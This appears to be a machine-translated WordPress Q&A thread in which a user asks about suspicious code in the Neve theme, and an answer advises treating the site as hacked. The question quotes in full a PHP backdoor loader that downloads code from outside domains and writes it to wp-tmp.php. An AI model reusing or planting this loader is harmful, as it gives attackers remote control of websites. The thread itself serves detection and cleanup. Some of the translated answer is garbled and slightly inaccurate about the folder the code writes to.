我在neve主题WordPress中有如下代码。我对这个代码感到怀疑
$wp_auth_key=\'ac15616a33a4bae1388c29de0202c5e1\';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);
if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
@file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
@file_put_contents(\'wp-tmp.php\', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);
if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
@file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
@file_put_contents(\'wp-tmp.php\', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
最合适的回答,由SO网友:Rick Hellewell 整理而成
我同意,很有可能会有一个带有该代码的黑客网站。@file\\u put\\u contents语句正在尝试写入您的wp admin文件夹。那可不好。
因此,我建议进行反黑客检查。如果你认为你的网站被黑客攻击了,那么你必须做一些(很多)事情来“反黑客”。包括:
更改所有密码(WP管理员、FTP、主机、数据库)重新安装WP(通过更新页面),然后手动重新安装所有主题(从存储库)和插件set of procedures that I use. 不过,这是可以做到的,只需要做一点工作。
